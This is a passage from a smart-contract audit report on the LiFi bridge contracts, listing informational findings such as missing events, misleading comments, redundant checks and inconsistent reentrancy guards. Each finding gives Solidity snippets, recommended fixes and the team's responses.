Recommendation: Consider storing the chain's Nomad domain ID as an immutable variable in AmarokFacet, and pass that to the Connext bridge. There is no gas overhead for this due to storing the ID as immutable. LiFi: Fixed with PR #50. Spearbit: Verified.
+5.5.22 Amount swapped not emitted Severity: Informational Context: ILiFi.sol#L20-L41
Description: The events LiFiTransferStarted() and LiFiTransferCompleted() don't emit the amount after the swap (i.e. the real amount that is being bridged / transferred to the receiver). This might be useful to add.
event LiFiTransferStarted(
    bytes32 indexed transactionId,
    string bridge,
    string bridgeData,
    string integrator,
    address referrer,
    address sendingAssetId,
    address receivingAssetId,
    address receiver,
    uint256 amount,
    uint256 destinationChainId,
    bool hasSourceSwap,
    bool hasDestinationCall
);
event LiFiTransferCompleted(
    bytes32 indexed transactionId,
    address receivingAssetId,
    address receiver,
    uint256 amount,
    uint256 timestamp
);
Recommendation: Consider adding the amount swapped to the events LiFiTransferStarted() and LiFiTransferCompleted(). LiFi: Fixed with PR #75. Spearbit: Verified.
+5.5.23 Comment is not compatible with code Severity: Informational Context: HyphenFacet.sol#L100
Description: In HyphenFacet, a comment mentions that approval is given to Anyswap, but approval is actually given to the Hyphen router.
function _startBridge(HyphenData memory _hyphenData) private {
    // Check chain id
    if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork();
    if (_hyphenData.token != address(0)) {
        // Give Anyswap approval to bridge tokens
        LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount);
    }
Recommendation: Change the comment in HyphenFacet. LiFi: Fixed with PR #61. Spearbit: Verified.
+5.5.24 Move whitelist to LibSwap.swap() Severity: Informational Context: LibSwap.sol#L30-L68, SwapperV2.sol#L67-L81
Description: The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), it might enable access to transferFrom() and thus stealing of tokens. Also see issue "Too generic calls in GenericBridgeFacet allow stealing of tokens". Luckily, most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue "_executeSwaps of Executor.sol doesn't have a whitelist".
library LibSwap {
    function swap(bytes32 transactionId, SwapData calldata _swapData) internal {
        if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract();
        ...
        (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData);
        ...
    }
}
contract SwapperV2 is ILiFi {
    function _executeSwaps(...) ... {
        ...
        if (
            !(appStorage.dexAllowlist[currentSwapData.approveTo] &&
                appStorage.dexAllowlist[currentSwapData.callTo] &&
                appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])])
        ) revert ContractCallNotAllowed();
        LibSwap.swap(_lifiData.transactionId, currentSwapData);
    }
}
Recommendation: Consider moving the whitelists from SwapperV2 into the function LibSwap.swap(). Once the whitelists are integrated, the check if (!LibAsset.isContract(_swapData.callTo)) can be moved to the whitelisting management functions. This will save gas when calling LibSwap.swap(). Alternatively, add a warning comment to function LibSwap.swap() which indicates the risk. LiFi: We do not intend to add whitelisting to the library as it is intended to be more low level and less restrictive. Whitelisting will be done if desired by the individual contracts that utilize it. Spearbit: Acknowledged.
+5.5.25 Redundant check on the HyphenFacet Severity: Informational Context: HyphenFacet.sol#L97
Description: In the HyphenFacet, there is a condition which checks that the source chain is different from the destination chain id. However, this check is already present in the Hyphen contracts (_depositErc20, _depositNative).
function _startBridge(HyphenData memory _hyphenData) private {
    // Check chain id
    if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork();
}
Recommendation: Although pre-state checks are useful, the redundant check can be removed. LiFi: Fixed with PR #55. Spearbit: Verified.
+5.5.26 Check input amount equals swapped amount Severity: Informational Context: OmniBridgeFacet.sol#L52-L68, SwapperV2.sol#L22-L39, Executor.sol#L146-L150, StargateFacet.sol#L95-L114
Description: The bridge functions don't check that the input amount (_bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily, noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the originator or receiver. However, this fixes symptoms instead of preventing the issue.
function swapAndStartBridgeTokensViaOmniBridge(
    ...
    LibSwap.SwapData[] calldata _swapData,
    BridgeData calldata _bridgeData
) ... {
    ...
    uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender));
    ...
}
Recommendation: Verify the input amount is equal to the swapped amount. Also check issue "Consider using wrapped native token": as the function swapAndStartBridgeTokensViaStargate() shows, native tokens can be used in every swap, so checking it thoroughly requires a for loop.
function swapAndStartBridgeTokensViaStargate(...) ... {
    ...
    uint256 nativeFee = msg.value;
    for (uint8 i = 0; i < _swapData.length; i++) {
        if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) {
            nativeFee -= _swapData[i].fromAmount;
        }
    }
    ...
}
LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.27 Use same layout for facets Severity: Informational Context: LiFi Facets
Description: The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain if it is the same everywhere.
AmarokFacet.sol:         _startBridge(_lifiData, _bridgeData, amount, true);
ArbitrumBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true);
OmniBridgeFacet.sol:     _startBridge(_lifiData, _bridgeData, amount, true);
OptimismBridgeFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true);
PolygonBridgeFacet.sol:  _startBridge(_lifiData, _bridgeData, true);
StargateFacet.sol:       _startBridge(_stargateData, _lifiData, nativeFee, true);
AcrossFacet.sol:         _startBridge(_acrossData);
CBridgeFacet.sol:        _startBridge(_cBridgeData);
GenericBridgeFacet.sol:  _startBridge(_bridgeData);
GnosisBridgeFacet.sol:   _startBridge(gnosisBridgeData);
HopFacet.sol:            _startBridge(_hopData);
HyphenFacet.sol:         _startBridge(_hyphenData);
NXTPFacet.sol:           _startBridge(_nxtpData);
AnyswapFacet.sol:        _startBridge(_anyswapData, underlyingToken, isNative);
WormholeFacet.sol:       _startBridge(_wormholeData);
AxelarFacet.sol:         // no _startBridge
Recommendation: Consider using the same layout everywhere. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.28 Safety check is missing on the remaining amount Severity: Informational Context: FeeCollector.sol#L70
Description: In the FeeCollector contract, there is no safety check to ensure the remaining amount doesn't underflow and revert.
function collectNativeFees(
    uint256 integratorFee,
    uint256 lifiFee,
    address integratorAddress
) external payable {
    uint256 remaining = msg.value - (integratorFee + lifiFee);
    ...
}
Recommendation: It is recommended to implement a check to ensure that msg.value is bigger than integratorFee + lifiFee.
function collectNativeFees(
    uint256 integratorFee,
    uint256 lifiFee,
    address integratorAddress
) external payable {
+   if (msg.value < integratorFee + lifiFee) revert NotEnoughAmount();
    uint256 remaining = msg.value - (integratorFee + lifiFee);
    ...
}
LiFi: Fixed with PR #47. Spearbit: Verified.
+5.5.29 Entire struct can be emitted Severity: Informational Context: OmniBridgeFacet.sol#L34-L107
Description: The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all fields of the struct. It's also possible to emit the entire struct in one go. This would make the code smaller and easier to maintain.
function _startBridge(LiFiData calldata _lifiData, ...) ... {
    ...
    // do actions
    emit LiFiTransferStarted(
        _lifiData.transactionId,
        "omni",
        "",
        _lifiData.integrator,
        _lifiData.referrer,
        _lifiData.sendingAssetId,
        _lifiData.receivingAssetId,
        _lifiData.receiver,
        _lifiData.amount,
        _lifiData.destinationChainId,
        _hasSourceSwap,
        false
    );
}
Recommendation: Consider emitting the entire struct (see the sketch after 5.5.30 below). Note: the indexed fields have to be separated out. It could look like this:
emit LiFiTransferStarted(transactionId, _lifiData, bridge, bridgeData, hasSourceSwap, hasDestinationCall);
Or like this, if the remaining fields are also put in the struct and the data is added before the emit:
emit LiFiTransferStarted(transactionId, _lifiData);
LiFi: Generally we do not emit the lifiData contents, this only should happen if no other information source can be found for the event parameters. Spearbit: Acknowledged.
+5.5.30 Redundant return value from internal function Severity: Informational Context: NXTPFacet.sol#L143
Description: Callers of the NXTPFacet._startBridge() function never use its return value.
Recommendation: Consider removing line NXTPFacet.sol#L143 and emitting an event to log important data instead. LiFi: Fixed with PR #52. Spearbit: Verified.
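To illustrate the recommendation in 5.5.29, a minimal sketch, assuming Solidity >= 0.8 (ABI coder v2): a struct can be emitted as a single non-indexed event parameter while indexed fields stay separate; the struct fields below are abbreviated, not the full LiFiData definition:
contract EmitStructSketch {
    struct LiFiData {
        bytes32 transactionId;
        address receiver;
        uint256 amount;
    }

    // the indexed field is separated out; the struct travels as one ABI-encoded blob
    event LiFiTransferStarted(bytes32 indexed transactionId, LiFiData lifiData);

    function startBridge(LiFiData calldata _lifiData) external {
        // ... bridge actions ...
        emit LiFiTransferStarted(_lifiData.transactionId, _lifiData);
    }
}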
+5.5.31 Change comment on the LibAsset Severity: Informational Context: LibAsset.sol#L8
Description: The following comment is used in the LibAsset.sol contract. However, Connext doesn't have this file anymore and deleted it with the following commit.
/// @title LibAsset
/// @author Connext
/// @notice This library contains helpers for dealing with onchain transfers
///         of assets, including accounting for the native asset `assetId`
///         conventions and any noncompliant ERC20 transfers
library LibAsset {}
Recommendation: Consider changing the comment on the library. LiFi: Fixed with PR #45. Spearbit: Verified.
+5.5.32 Integrate all variants of _executeAndCheckSwaps() Severity: Informational Context: Executor.sol#L126-L171, Executor.sol#L178-L221, Executor.sol#L228-L265, SwapperV2.sol#L46-L60, Swapper.sol#L45-L58, XChainExecFacet.sol#L17-L52
Description: There are multiple functions that are more or less the same:
• swapAndCompleteBridgeTokensViaStargate() of Executor.sol
• swapAndCompleteBridgeTokens() of Executor.sol
• swapAndExecute() of Executor.sol
• _executeAndCheckSwaps() of SwapperV2.sol
• _executeAndCheckSwaps() of Swapper.sol
• swapAndCompleteBridgeTokens() of XChainExecFacet
As these are important functions, it is worth the trouble to have one code base to maintain. For example, swapAndCompleteBridgeTokens() doesn't check msg.value == 0 when ERC20 tokens are sent. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol.
Recommendation: Integrate the functions to use one code base. The slight differences between the functions should of course be separated out. Also combine this with issue "Pulling tokens by LibSwap.swap() is counterintuitive". LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.33 Utilize NATIVE_ASSETID constant from LibAsset Severity: Informational Context: AcrossFacet.sol#L20, WithdrawFacet.sol#L16, WithdrawFacet.sol#L85, DexManagerFacet.sol#L168
Description: In the codebase, the LibAsset library contains a variable which defines the zero address. However, the definition is repeated in the facets. Code should not be repeated, and it's better to have one version used everywhere to reduce the likelihood of bugs.
contract AcrossFacet {
    address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000;
}
contract DexManagerFacet {
    if (_dex == 0x0000000000000000000000000000000000000000)
}
contract WithdrawFacet {
    address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000;
    ...
    address sendTo = (_to == address(0)) ? msg.sender : _to;
}
Recommendation: Use LibAsset's NATIVE_ASSETID or NULL_ADDRESS variable. LiFi: Fixed with PR #41. Spearbit: Verified.
+5.5.34 Native matic will be treated as ERC20 token Severity: Informational Context: WithdrawFacet.sol#L16
Description: LiFi supports Polygon in their implementation. However, native MATIC on Polygon has the contract address 0x0000000000000000000000000000000000001010. Even if it does not pose any risk, native MATIC will be treated as an ERC20 token.
contract WithdrawFacet {
    address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; // address(0)
    ...
Recommendation: Ensure that all native asset withdrawals are not interrupted by the native MATIC address (a sketch follows below). LibAsset can be utilized for this informational issue. LiFi: Acknowledged. Spearbit: Acknowledged.
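A possible direction for 5.5.34, sketched under the assumption that such a helper would live next to LibAsset's isNativeAsset(); the library name is hypothetical, and treating 0x...1010 as native is gated to Polygon (chain id 137) since the pseudo-token only exists there:
library NativeAssetSketch {
    // Polygon's native MATIC pseudo-token address (only meaningful on Polygon)
    address internal constant POLYGON_NATIVE_MATIC = 0x0000000000000000000000000000000000001010;

    // Treats both the zero-address sentinel and, on Polygon deployments,
    // the MATIC pseudo-token as the native asset.
    function isNativeAsset(address assetId) internal view returns (bool) {
        if (assetId == address(0)) return true;
        return block.chainid == 137 && assetId == POLYGON_NATIVE_MATIC;
    }
}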
+5.5.35 Multiple versions of noLeftovers modifier Severity: Informational Context: Swapper.sol#L22, SwapperV2.sol#L22, Executor.sol#L41
Description: The modifier noLeftovers is defined in 3 different files: Swapper.sol, SwapperV2.sol and Executor.sol. While the versions in Swapper.sol and Executor.sol are the same, they differ from the one in SwapperV2.sol. Assuming the recommendation for "Processing of end balances" is followed, the only difference is that noLeftovers in SwapperV2.sol doesn't revert when the new balance is less than the initial balance. Code should not be repeated, and it's better to have one version used everywhere to reduce the likelihood of bugs.
Recommendation: Only keep one canonical version of the noLeftovers modifier, in SwapperV2.sol. Keep in mind the one difference among the different versions while making this change. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.5.36 Reduce unchecked scope Severity: Informational Context: FusePoolZap.sol#L46, FusePoolZap.sol#L78
Description: Both zapIn() functions in FusePoolZap.sol operate in an unchecked block, which means any contained arithmetic can underflow or overflow. Currently, it affects only one line in both functions:
• FusePoolZap.sol#L67: uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance;
• FusePoolZap.sol#L104: mintAmount = mintAmount - preMintBalance;
Having unchecked for such a large scope when it is applicable to only one line is dangerous.
Recommendation: Limit the scope of unchecked to only the two lines pointed out above, or remove unchecked entirely since it is just one-off arithmetic and doesn't save much gas. LiFi: Fixed with PR #54. Spearbit: Verified.
+5.5.37 No event exists for core paths/functions Severity: Informational Context: PeripheryRegistryFacet.sol#L19, LibAccess.sol#L32, LibAccess.sol#L40, AccessManagerFacet.sol#L15
Description: Several key actions are defined without event declarations. Owner-only functions that change critical parameters can emit events to record these changes on-chain for off-chain monitors/tools/interfaces. There are 4 instances of this issue:
contract PeripheryRegistryFacet {
    function registerPeripheryContract(...) ... { }
}
contract LibAccess {
    function addAccess(...) ... { }
    function removeAccess(...) ... { }
}
contract AccessManagerFacet {
    function setCanExecute(...) ... { }
}
Recommendation: Add events to all functions that change critical parameters/functionalities (a sketch follows after 5.5.38 below). LiFi: Fixed with PR #40. Spearbit: Verified.
+5.5.38 Rename _receiver to _leftoverReceiver Severity: Informational Context: SwapperV2.sol#L22-L81, Swapper.sol, Executor.sol
Description: In the contracts Swapper.sol, SwapperV2.sol and Executor.sol the parameter _receiver is used in various places. Its name seems to suggest that the swapped tokens are sent to the _receiver; however, this is not the case. Instead, the leftover tokens are sent to the _receiver. This makes the code more difficult to read and maintain.
contract SwapperV2 is ILiFi {
    modifier noLeftovers(..., address payable _receiver) { ... }
    function _executeAndCheckSwaps(..., address payable _receiver) ... { ... }
    function _executeSwaps(..., address payable _receiver) ... { ... }
}
Recommendation: Rename _receiver to something like _leftoverReceiver. LiFi: Fixed with PR #39. Spearbit: Verified.
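To illustrate the recommendation for 5.5.37, a hedged sketch of declaring and emitting an event from a privileged configuration function; the names follow the finding but the bodies are simplified and the authorization call is elided:
contract AccessManagerSketch {
    event ExecutionAllowed(address indexed account, bytes4 indexed selector, bool allowed);

    mapping(address => mapping(bytes4 => bool)) internal canExecute;

    function setCanExecute(address account, bytes4 selector, bool allowed) external {
        // LibDiamond.enforceIsContractOwner(); // owner check elided in this sketch
        canExecute[account][selector] = allowed;
        emit ExecutionAllowed(account, selector, allowed); // on-chain record for monitors
    }
}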
+5.5.39 Native tokens don't need SwapData.approveTo Severity: Informational Context: SwapperV2.sol#L67-L81, Swapper.sol#L65-L78
Description: The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. These checks also include a check on approveTo; however, approveTo is not relevant when a native token is being used. Currently, the caller of the LiFi Diamond has to specify a whitelisted currentSwapData.approveTo to be able to execute _executeSwaps(), which doesn't seem logical. Present in both SwapperV2.sol and Swapper.sol:
function _executeSwaps(...) ... {
    ...
    if (
        !(appStorage.dexAllowlist[currentSwapData.approveTo] &&
            appStorage.dexAllowlist[currentSwapData.callTo] &&
            appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])])
    ) revert ContractCallNotAllowed();
    LibSwap.swap(_lifiData.transactionId, currentSwapData);
}
Recommendation: Skip the approveTo check when a native token is used. Alternatively, document what value has to be supplied in currentSwapData.approveTo when using native tokens and make sure it is whitelisted. LiFi: Fixed with PR #71. Spearbit: Verified.
+5.5.40 Inaccurate comment on the maxApproveERC20() function Severity: Informational Context: LibAsset.sol#L40
Description: During the code review, it was observed that the comment is incompatible with the functionality. The maxApproveERC20 function approves MAX if the asset does not have a sufficient allowance. The comment could be replaced with "If a sufficient allowance is not present, the allowance is set to MAX".
/// @notice Gives MAX approval for another address to spend tokens
/// @param assetId Token address to transfer
/// @param spender Address to give spend approval to
/// @param amount Amount to approve for spending
function maxApproveERC20(
    IERC20 assetId,
    address spender,
    uint256 amount
)
Recommendation: Consider changing the comment on the maxApproveERC20 function. LiFi: Fixed with PR #23. Spearbit: Verified.
+5.5.41 Undocumented contracts Severity: Informational Context: FusePoolZap.sol, SwapperV2.sol, WormholeFacet.sol
Description: All systematic contracts are documented in the docs directory. However, several contracts are not documented. LiFi is integrated with third-party platforms through an API. To understand code functionality, the related contracts should be documented in the directory.
Recommendation: Consider documenting these contracts more explicitly by describing their purpose and providing contextual information regarding their functionality. All interacted contracts can be mentioned at the beginning of the file, and struct values can be documented per contract. LiFi: Fixed with PR #66. Spearbit: Verified.
+5.5.42 Utilize built-in library function on the address check Severity: Informational Context: AmarokFacet.sol#L67, AmarokFacet.sol#L46, AnyswapFacet.sol#L67, AnyswapFacet.sol#L98, HyphenFacet.sol#L99, StargateFacet.sol#L225, LibAsset.sol#L80-L131
Description: In the codebase, the LibAsset library contains the function which determines whether the given assetId is the native asset. However, this check is not used, and many of the other contracts apply the address check separately.
contract AmarokFacet {
    function startBridgeTokensViaAmarok(...) ... {
        ...
        if (_bridgeData.assetId == address(0)) ...
    }
    function swapAndStartBridgeTokensViaAmarok(...) ... {
        ...
        if (_bridgeData.assetId == address(0)) ...
    }
}
contract AnyswapFacet {
    function swapAndStartBridgeTokensViaAnyswap(...) ... {
        ...
        if (_anyswapData.token == address(0)) revert TokenAddressIsZero();
        ...
    }
}
contract HyphenFacet {
    function _startBridge(...) ... {
        ...
        if (_hyphenData.token != address(0)) ...
    }
}
contract StargateFacet {
    function _startBridge(...) ... {
        ...
        if (token == address(0)) ...
    }
}
contract LibAsset {
    function transferFromERC20(...) ... {
        ...
        if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token();
        ...
    }
    function transferAsset(...) ... {
        ...
        (assetId == NATIVE_ASSETID)
        ...
    }
}
Recommendation: It is recommended to utilize LibAsset's isNativeAsset function.
...
- if (_bridgeData.assetId == address(0)) {
+ if (LibAsset.isNativeAsset(_bridgeData.assetId)) {
      revert TokenAddressIsZero();
  }
...
LiFi: Fixed with PR #14. Spearbit: Verified.
+5.5.43 Consider using wrapped native token Severity: Informational Context: LiFi src
Description: The code currently supports bridging native tokens. However, this has the following drawbacks:
• not every bridge supports native tokens;
• native tokens have an inherent risk of reentrancy;
• native tokens introduce additional code paths, which is more difficult to maintain and results in a higher risk of bugs.
Also, wrapped tokens are more composable. This is also useful for bridges that currently don't support native tokens like the AxelarFacet, the WormholeFacet, and the StargateFacet.
Recommendation: Consider only supporting wrapped native tokens in the LiFi Protocol. An additional wrapper layer can be used to convert the native token in a generic way. LiFi: No plans to implement wrapping across the board at this time. Spearbit: Acknowledged.
+5.5.44 Incorrect event emitted Severity: Informational Context: FeeCollector.sol#L180, OwnershipFacet.sol#L55
Description: Li.fi follows a two-step ownership transfer pattern, where the current owner first proposes an address to be the new owner. Then that address accepts the ownership in a different transaction via confirmOwnershipTransfer():
function confirmOwnershipTransfer() external {
    if (msg.sender != pendingOwner) revert NotPendingOwner();
    owner = pendingOwner;
    pendingOwner = LibAsset.NULL_ADDRESS;
    emit OwnershipTransferred(owner, pendingOwner);
}
At the time of emitting OwnershipTransferred, pendingOwner is always address(0) and owner is the new owner. This event should be used to log the addresses between which the ownership transfer happens.
Recommendation: Emit the event before the ownership transfer happens:
function confirmOwnershipTransfer() external {
    address _pendingOwner = pendingOwner;
    if (msg.sender != _pendingOwner) revert NotPendingOwner();
    emit OwnershipTransferred(owner, _pendingOwner);
    owner = _pendingOwner;
    pendingOwner = LibAsset.NULL_ADDRESS;
}
Note the gas optimization of first storing the storage variable pendingOwner in memory as _pendingOwner. This is done to avoid the gas costs of reading the same storage variable more than once. LiFi: Implemented with PR #16. Spearbit: Verified.
+5.5.45 If statement does not check mintAmount properly Severity: Informational Context: FusePoolZap.sol#L100
Description: In the zapIn function, mintAmount is checked with the following if statement. However, it directly uses the contract balance instead of taking the difference between the balance and preMintBalance.
...
uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this));
if (!success && mintAmount == 0) {
    revert MintingError(res);
}
mintAmount = mintAmount - preMintBalance;
...
Recommendation: It is recommended to use the balance difference in the if statement (a self-contained sketch also follows after 5.5.50 below):
- uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this));
+ uint256 mintAmount = IERC20(address(fToken)).balanceOf(address(this)) - preMintBalance;
  if (!success && mintAmount == 0) {
      revert MintingError(res);
  }
- mintAmount = mintAmount - preMintBalance;
LiFi: Fixed with PR #17. Spearbit: Verified.
+5.5.46 Use address(0) for zero address Severity: Informational Context: LibAsset.sol#L15
Description: It's better to use the shorthands provided by Solidity for popular constant values to improve readability and reduce the likelihood of errors.
address internal constant NULL_ADDRESS = 0x0000000000000000000000000000000000000000; //address(0)
Recommendation: Use address(0) as the value for NULL_ADDRESS. LiFi: Fixed with PR #18. Spearbit: Verified.
+5.5.47 Better variable naming Severity: Informational Context: LibAsset.sol#L13
Description: MAX_INT is defined to be the maximum value of the uint256 data type:
uint256 private constant MAX_INT = type(uint256).max;
This variable name can be interpreted as the maximum value of the int256 data type, which is lower than type(uint256).max.
Recommendation: Rename MAX_INT to MAX_UINT. LiFi: Fixed with PR #33. Spearbit: Verified.
+5.5.48 Event is missing indexed fields Severity: Informational Context: FusePoolZap.sol#L33
Description: Indexed event fields make the fields more quickly accessible to off-chain tools that parse events. However, note that each indexed field costs extra gas during emission, so it's not necessarily best to index the maximum allowed per event (three fields).
Recommendation: Add indexes to the event.
...
- event ZappedIn(address pool, address fToken, uint256 amount);
+ event ZappedIn(address indexed pool, address indexed fToken, uint256 amount);
...
LiFi: Fixed with PR #34. Spearbit: Verified.
+5.5.49 Remove misleading comment Severity: Informational Context: WithdrawFacet.sol#L88
Description: WithdrawFacet.sol has the following misleading comment, which can be removed. It's unclear why this comment was made.
address self = address(this); // workaround for a possible solidity bug
Recommendation: Remove the comment, and directly use address(this) wherever self is used. LiFi: Fixed with PR #22. Spearbit: Verified.
+5.5.50 Redundant events/errors/imports on the contracts Severity: Informational Context: FusePoolZap.sol#L28, GenericSwapFacet.sol#L7, WormholeFacet.sol#L12, HyphenFacet.sol#L32, HyphenFacet.sol#L9, HopFacet.sol#L9, HopFacet.sol#L36, PolygonBridgeFacet.sol#L28, Executor.sol#L5, AcrossFacet.sol#L37, AcrossFacet.sol#L12, NXTPFacet.sol#L9
Description: During the code review, it was observed that several events and errors are not used in the contracts. By deleting redundant events and errors, gas can be saved.
• FusePoolZap.sol#L28 - CannotDepositNativeToken
• GenericSwapFacet.sol#L7 - ZeroPostSwapBalance
• WormholeFacet.sol#L12 - InvalidAmount and InvalidConfig
• HyphenFacet.sol#L32 - HyphenInitialized
• HyphenFacet.sol#L9 - InvalidAmount and InvalidConfig
• HopFacet.sol#L9 - InvalidAmount, InvalidConfig and InvalidBridgeConfigLength
• HopFacet.sol#L36 - HopInitialized
• PolygonBridgeFacet.sol#L28 - InvalidConfig
• Executor.sol#L5 - IAxelarGasService
• AcrossFacet.sol#L37 - UseWethInstead, InvalidAmount, NativeValueWithERC, InvalidConfig
• NXTPFacet.sol#L9 - InvalidAmount, NativeValueWithERC, NoSwapDataProvided, InvalidConfig
Recommendation: Consider removing redundant events and errors. LiFi: Fixed with PR #37. Spearbit: Verified.
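As referenced in 5.5.45, a self-contained sketch of measuring the minted amount as a balance delta around the mint call; mint(uint256) is the Compound-style signature, and the surrounding code is simplified, not the actual FusePoolZap implementation:
interface IERC20Like {
    function balanceOf(address account) external view returns (uint256);
}

contract ZapInSketch {
    error MintingError(bytes reason);

    // Measures the minted amount as a balance delta so a pre-existing fToken
    // balance cannot mask a failed mint.
    function zapInSketch(address fToken, uint256 amount) internal {
        uint256 preMintBalance = IERC20Like(fToken).balanceOf(address(this));
        (bool success, bytes memory res) = fToken.call(
            abi.encodeWithSignature("mint(uint256)", amount)
        );
        uint256 mintAmount = IERC20Like(fToken).balanceOf(address(this)) - preMintBalance;
        if (!success && mintAmount == 0) revert MintingError(res);
    }
}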
+5.5.51 forceSlow option is disabled on the AmarokFacet Severity: Informational Context: AmarokFacet.sol#L134
Description: In the AmarokFacet contract, the forceSlow option is disabled. According to the documentation, forceSlow is an option that allows users to take the Nomad slow path (~30 mins) instead of paying routers a 0.05% fee on their transaction.
...
IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({
    params: IConnextHandler.CallParams({
        to: _bridgeData.receiver,
        callData: _bridgeData.callData,
        originDomain: _bridgeData.srcChainDomain,
        destinationDomain: _bridgeData.dstChainDomain,
        agent: _bridgeData.receiver,
        recovery: msg.sender,
        forceSlow: false,
        receiveLocal: false,
        callback: address(0),
        callbackFee: 0,
        relayerFee: 0,
        slippageTol: _bridgeData.slippageTol
    }),
    transactingAssetId: _bridgeData.assetId,
    amount: _amount
});
...
Recommendation: The parameter can be taken as an argument of the _startBridge function. LiFi: Fixed with commit 5078. Spearbit: Verified.
+5.5.52 Incomplete NatSpec Severity: Informational Context: Executor.sol#L297, Executor.sol#L298, SwapperV2.sol#L49
Description: Some functions are missing @param for some of their parameters. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.
Recommendation: Consider adding full NatSpec comments for all functions to have complete code documentation for future use. LiFi: Fixed with PR #7 & PR #100. Spearbit: Verified.
+5.5.53 Use nonReentrant modifier in a consistent way Severity: Informational Context: AxelarFacet.sol#L35-L66, FusePoolZap.sol#L45-L77, StargateFacet.sol#L159-L179, Executor.sol#L105-L171
Description: The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() of contract AxelarFacet, zapIn of the contract FusePoolZap, and completeBridgeTokensViaStargate() / swapAndCompleteBridgeTokensViaStargate() of the StargateFacet don't have a nonReentrant modifier. All other facets that integrate with external contracts do have this modifier.
contract AxelarFacet {
    function executeCallWithTokenViaAxelar(...) ... { }
    function executeCallViaAxelar(...) ... { }
}
contract FusePoolZap {
    function zapIn(...) ... { }
}
There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. This makes the code more difficult to maintain and verify.
contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard {
    function sgReceive(...) external nonReentrant {
        ...
        this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver);
        ...
    }
    function completeBridgeTokensViaStargate(...) external {
        ...
    }
}
contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi {
    function sgReceive(...) external {
        ...
        this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver));
        ...
    }
    function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { }
}
Recommendation: Consider adding a nonReentrant modifier to executeCallViaAxelar() and executeCallWithTokenViaAxelar() of contract AxelarFacet and to zapIn of the contract FusePoolZap, to be more consistent with the rest of the code. Use the nonReentrant modifier with sgReceive() / completeBridgeTokensViaStargate() in a consistent way (a sketch of the usual guard follows below). LiFi: Fixed with PR #51. Spearbit: Verified.
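As referenced in 5.5.53, a sketch of the common storage-flag reentrancy guard applied to an externally reachable entry point; this mirrors the general ReentrancyGuard pattern, not LiFi's exact implementation:
abstract contract ReentrancyGuardSketch {
    uint256 private _status = 1; // 1 = not entered, 2 = entered

    error ReentrancyError();

    modifier nonReentrant() {
        if (_status == 2) revert ReentrancyError();
        _status = 2;
        _;
        _status = 1;
    }
}

contract AxelarFacetSketch is ReentrancyGuardSketch {
    function executeCallViaAxelar(/* ... */) external payable nonReentrant {
        // ... external interaction with the Axelar gateway ...
    }
}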
+5.5.54 Typos on the codebase Severity: Informational Context: Periphery/FeeCollector.sol#L168, DexManagerFacet.sol#L41, GenericBridgeFacet.sol#L108, AnyswapFacet.sol#L108, OwnershipFacet.sol#L31, NXTPFacet.sol#L121
Description: Across the codebase, there are typos in the comments.
• cancelOnwershipTransfer -> cancelOwnershipTransfer.
• addresss -> address.
• Conatains -> Contains.
• Intitiates -> Initiates.
Recommendation: Consider correcting the typos and review the codebase to check for more, to improve code readability. LiFi: Fixed with PR #5. Spearbit: Verified.
+5.5.55 Store all error messages in GenericErrors.sol Severity: Informational Context: lifinance src GenericErrors.sol
Description: The file GenericErrors.sol contains several error messages and is used from most other Solidity files. However, several other error messages are defined in the Solidity files themselves. It would be more consistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contracts also contain error messages which are not listed below. Here are the error messages contained in the Solidity files:
Facets/AcrossFacet.sol:37:          error UseWethInstead();
Facets/AmarokFacet.sol:31:          error InvalidReceiver();
Facets/ArbitrumBridgeFacet.sol:30:  error InvalidReceiver();
Facets/GnosisBridgeFacet.sol:31:    error InvalidDstChainId();
Facets/GnosisBridgeFacet.sol:32:    error InvalidSendingToken();
Facets/OmniBridgeFacet.sol:27:      error InvalidReceiver();
Facets/OptimismBridgeFacet.sol:29:  error InvalidReceiver();
Facets/OwnershipFacet.sol:20:       error NoNullOwner();
